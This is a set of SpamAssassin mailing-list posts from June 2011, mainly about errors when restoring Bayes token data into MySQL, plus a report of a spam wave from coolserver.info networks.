dbg: bayes: error inserting token for line: t 0 2 1308070890 d2eec4f659

I'll try the suggested my.cnf changes and restart the process.


I thought it would take longer before it started to fail again, but 
trying to change the character set didn't make a difference for me.


Thanks,
Dave


Re: Migrating bayes to mysql fails with parsing errors

2011-06-21 Thread Dave Wreski

Hi,


since so many have problems i share my mysql schemas :=)

please note that i expire some data, which is not done by default in current
spamassassin


Your schema did not work for me. I deleted the existing database and 
recreated it, then created the tables using your schema. When starting 
to restore, a number of errors including these are produced:


Use of uninitialized value in concatenation (.) or string at 
/usr/share/perl5/Mail/SpamAssassin/BayesStore/SQL.pm line 139.

bayes: found bayes db version
Use of uninitialized value $db_ver in numeric ne (!=) at 
/usr/share/perl5/Mail/SpamAssassin/BayesStore/SQL.pm line 141.
Use of uninitialized value $db_ver in concatenation (.) or string at 
/usr/share/perl5/Mail/SpamAssassin/BayesStore/SQL.pm line 142.
bayes: database version  is different than we understand (3), aborting! 
at /usr/share/perl5/Mail/SpamAssassin/BayesStore/SQL.pm line 142.


It appears I'm using the same version as your schema indicated, so I'm 
not sure what the problem could be.


mysql  Ver 14.14 Distrib 5.1.56, for redhat-linux-gnu (x86_64) using 
readline 5.1


Thanks,
Dave


Migrating bayes to mysql fails with parsing errors

2011-06-20 Thread Dave Wreski

Hi,

I have an existing v3.3.2 on fedora14 (perl v5.12.3) that I'm trying to 
convert bayes to use mysql. The restore process fails after a few 
minutes due to too many errors:


dbg: bayes: error inserting token for line: t 1 0 1308114254 4fd2b3f2f0
dbg: bayes: _put_token: Updated an unexpected number of rows.
[repeats ...]
bayes: encountered too many errors (20) while parsing token line, 
reverting to empty database and exiting
dbg: plugin: Mail::SpamAssassin::Plugin::Bayes=HASH(0x26b8af8) 
implements 'learner_close', priority 0
ERROR: Bayes restore returned an error, please re-run with -D for more 
information


This was already run with -D, so no further information is available.

I used the sql files from 
spamassassin.apache.org/full/3.0.x/dist/sql/bayes_mysql.sql to create 
the tables. Maybe the format has changed since then and there is a more 
updated file?


I'm using the sa from 
http://kojipkgs.fedoraproject.org/packages/spamassassin/3.3.2/1.fc14/x86_64/


Is there a way to skip these invalid records? Other ideas for resolving 
this?


I can successfully restore back to the normal dbm database.

Thanks,
Dave


Re: Migrating bayes to mysql fails with parsing errors

2011-06-20 Thread Dave Wreski

Hi,


This one is the current SQL schema and works

http://svn.apache.org/repos/asf/spamassassin/tags/spamassassin_current_release_3.3.x/sql/bayes_mysql.sql


- Lawrence

On 20/06/2011 7:34 PM, Dave Wreski wrote:

Hi,

I have an existing v3.3.2 on fedora14 (perl v5.12.3) that I'm trying
to convert bayes to use mysql. The restore process fails after a few
minutes due to too many errors:

dbg: bayes: error inserting token for line: t 1 0 1308114254 4fd2b3f2f0
dbg: bayes: _put_token: Updated an unexpected number of rows.
[repeats ...]


There are still the same errors with the new schema. Could it be a 
problem with the backup itself? I just used sa-learn --backup > 
backup.txt to create the backup.
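
One way to rule out the backup file itself would be a quick format check. This is only a sketch, assuming token lines look like the ones in the debug output above ("t", spam count, ham count, atime, then a 10-character hex token); the function name is made up:

```shell
# Counts "t" lines in a backup file and reports those that do not have
# five fields ending in a 10-character lowercase hex token.
check_token_lines() {
    awk '$1 == "t" {
             total++
             if (NF != 5 || $5 !~ /^[0-9a-f]+$/ || length($5) != 10) bad++
         }
         END { printf "%d token lines, %d malformed\n", total, bad }' "$1"
}
```

If check_token_lines backup.txt reports no malformed lines, the errors are more likely coming from the database side than from the backup.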


Thanks,
Dave


Re: Migrating bayes to mysql fails with parsing errors

2011-06-20 Thread Dave Wreski

Hi,


I have an existing v3.3.2 on fedora14 (perl v5.12.3) that I'm trying
to convert bayes to use mysql. The restore process fails after a few
minutes due to too many errors:

dbg: bayes: error inserting token for line: t 1 0 1308114254 4fd2b3f2f0
dbg: bayes: _put_token: Updated an unexpected number of rows.
[repeats ...]

Did you make the backup using 3.3.2 as well?


Yes, and the bdb was originally created just recently using a v3.3.2 
pre-release as well. I also made sure the bdb was synced before trying 
to do the backup.


Thanks,
Dave


Re: Nearly 200.000 Spams today from coolserver.info and starsweet.info

2011-06-16 Thread Dave Wreski

Hi,


For some days my servers have been hit by 50.000-80.000 spams a day, and
for some minutes today they spammed 18 accounts out of 98.000 with MORE than
100.000 spams.

All spams are coming from the same network:

  xxx.root.static.coolserver.info
  xxx.root.static.starsweet.info

where xxx changes every time, and the server's IP too (they resolve).

In the body of the messages I found these domains:

advocatebuying.info     aidpurchase.info        encouragebuying.info
ensurepurchase.info     guidebuying.info        motivatebuying.info
providebuying.info      purchaseadvocate.info   purchaseaid.info
purchaseassist.info     purchasecoach.info      purchaseguide.info
purchasesimplify.info   purchasesupport.info    simplifybuying.info
supportbuying.info      techsweet.info          topsweet.info


It hits bayes99 and is well over the threshold for me (example.com is my 
edit):


Jun 16 02:55:38 mail01 postfix/smtpd[13098]: 947E913D4015: client=46.wc.static.coolserver.info[173.245.204.46]
Jun 16 02:55:39 mail01 amavis[11055]: (11055-315) SPAM, lonnyear...@supportbuying.info -> 26...@example.com, Yes, hits=18.9 tag1=-300.0 tag2=5.0 kill=5.0 use_bayes=1 tests=BAYES_99, BOTNET, KHOP_DNSBL_BUMP, RAZOR2_CF_RANGE_51_100, RAZOR2_CF_RANGE_E8_51_100, RAZOR2_CHECK, RCVD_IN_BRBL_LASTEXT, RCVD_IN_HOSTKARMA_BL, RCVD_IN_UCEPROTECT2, RCVD_IN_UCEPROTECT3, RELAYCOUNTRY_LOW, SEM_URI, SEM_URIRED, SPF_HELO_PASS, SPF_PASS, TO_NO_BRKTS_DIRECT, TO_NO_BRKTS_NOTLIST, URIBL_BLACK, quarantine spam-da25d90871b51f12e9de15bd5c5192cc-20110616-025538-11055-315 (spam-quarantine)


I have a few thousand as well, and all of them appear to have been tagged 
properly. I've also now blocked the /23 at the SMTP level.


Regards,
Dave


Re: MySQL bayes setup question

2011-06-14 Thread Dave Wreski

Marc,


You can also find the readme for sql support there, or check out:
http://svn.apache.org/repos/asf/spamassassin/branches/3.3/sql/README.bayes

It's quite easy to setup and get running.


I can't seem to find the bayes_mysql.sql file anywhere.


Depending on your distribution it could be in a number of places. You
could try a:
find / -name bayes_mysql.sql

If you have svn installed you can download it via svn. You can also
download it with wget (or view in browser) directly via:
http://svn.apache.org/repos/asf/spamassassin/branches/3.3/sql/bayes_mysql.sql

From there it's as easy as configuring your local.cf to use Bayes SQL
and creating the tables in mysql. Don't forget to backup your existing
bayes tokens and such before doing any changes. You can later restore
that backup to Mysql so you don't lose any training.


Thanks - that's what I was looking for.


You might also find this helpful:

http://www200.pair.com/mecham/spam/debian-spamassassin-sql.html

Regards,
Dave